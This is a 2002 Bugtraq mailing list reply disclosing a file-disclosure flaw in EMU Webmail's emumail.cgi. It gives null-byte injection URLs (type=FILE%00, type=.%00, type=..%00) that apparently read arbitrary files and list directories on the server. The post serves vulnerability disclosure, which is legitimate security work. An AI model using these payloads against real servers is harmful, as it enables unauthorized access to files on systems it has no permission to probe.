Bugtraq mailing list archives
Re: emumail.cgi
From: "N|ghtHawk" <nighthawk () hackers4hackers nl>
Date: Fri, 5 Apr 2002 02:10:42 +0200
name : emumail.cgi date : 04/04/2002 description : EMU Webmail: how to check your email from the web. severity : Low/average-risk homepage : www.emumail.com Any user can view files on the remote system: xxx/PATH/emumail.cgi?type=FILE%00 The vendor were contact about that
http://site/emumail.cgi?type=.%00 Seems to give the directory index of the current directory. http://site/emumail.cgi?type=..%00 Seems to give the directory index of ../ -- N|ghtHawk http://www.hackers4hackers.org
Current thread:
- emumail.cgi acidneo (Apr 04)
- Re: emumail.cgi Tom Micklovitch (Apr 05)
- Re: emumail.cgi, one more local vulnerability (not verified) Leif Jakob (Apr 10)
- <Possible follow-ups>
- Re: emumail.cgi N|ghtHawk (Apr 05)
- Re: emumail.cgi MegaHz (Apr 08)
- Re: emumail.cgi Randal L. Schwartz (Apr 09)
- Re: emumail.cgi MegaHz (Apr 08)